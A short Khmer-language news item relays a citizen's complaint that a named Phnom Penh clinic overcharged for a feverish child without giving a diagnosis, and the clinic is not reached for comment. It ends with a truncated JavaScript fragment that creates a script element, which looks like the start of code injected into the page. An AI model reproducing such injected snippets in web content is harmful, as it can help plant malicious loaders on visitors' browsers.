ពលរដ្ឋរិះគន់ ក្លីនិកម៉ាកូសា ផ្សាដីហុយ ជាគ្លីនិកកាប់ឆៅ (កោរមិនដាក់ទឹក)
ភ្នំពេញ៖ មុននេះ បន្តិច Page ដេីម្បីមនុស្សធម៌ បានសរសេរបង្ហោះដូចខាងក្រោម៖ឆ្លៀតពេលផ្សាយពាណិជ្ជកម្មឲ្យគ្លិនិច១នេះតិចចុះ។ ក្មេងក្តៅខ្លួន ពេទ្យគ្លិនិចនេះសុំឲ្យជួសឈាមរកមេរោគគ្រុនឈាម កំដៅឡើង38.50 អង្សារ សុំឲ្យភ្ជួរសេរ៉ូម ។ ចេញលទ្ធផលឈាម អត់មានគ្រុនឈាម អត់ដឹងមូលហេតុនាំឲ្យក្តៅខ្លួនទៀត តែឲ្យថ្នាំ ទីមីណុល លេប ដើម្បីបញ្ចុះកំដៅ ។
ដល់ពេលគិតលុយអស់ស្ទះគិតតាំងពី សេវាមើលថែ ថ្លៃពេទ្យព្យាបាល ថ្លៃសេវាគិលានុប្បដ្ឋាយិការ ថ្លៃគ្លីនិច ថ្លៃឧបករណ៌ពេទ្យ និងថ្លៃធ្វើតេស្តឈាម សរុបទាំងអស់ 72,14 ដុល្លា (ចុះថ្លៃរួច) មុនចុះថ្លៃ 90,17 ដុល្លា។
ចុងក្រោយពេលពិនិត្យរួច អត់ដឹងថាក្មេងឈឺអី តែគិតលុយម៉ាឆ្ងាញ់ដៃ។
សូមផ្តាំទៅម្ចាស់គ្លីនិចនេះផងចុះ ខ្ញុំចូលបានតែម្តងនឹងទេ ហើយសុំផ្ញើរសារនេះដល់ពលរដ្ឋផ្សេងទៀត បើជៀសបានកុំចូលពេទ្យនេះឲ្យសោះ ។ ចុងក្រោយខ្ញុំសូមបិណ្ឌបាទចិត្តមេត្តាធម៌លោកខ្លះទៅ អាណិតប្រជាជនដែលគ្នាខ្វះខាត ហើយសុំពិនិត្យឲ្យមានលទ្ធផលច្បាស់ផង ឬមួយលោកកាប់ថ្លៃកប់កប់ចឹងឆាប់បានលុយទិញមឈូសមាសទុក?
ជុំវិញបញ្ហានេះ បណ្តាញព៌ត័មាន អីន អិន មិនពុំអាចសុំការបំភ្លឺពីម្ចាស់ ក្លីនិកម៉ាកូសានៅឡើង ព្រោះទូរស័ទ្ទចូលជួប Receptionist គាត់មិនពុំមានសិទ្ធិបកស្រាយទេ ចង់ជ្រាបច្បាស់ ទាល់តែមកជួបលោក វិជ្ជបណ្ឌិត នៅក្លីនិកផ្ទាល់។
var d=document;var s=d.createElement(‘script’);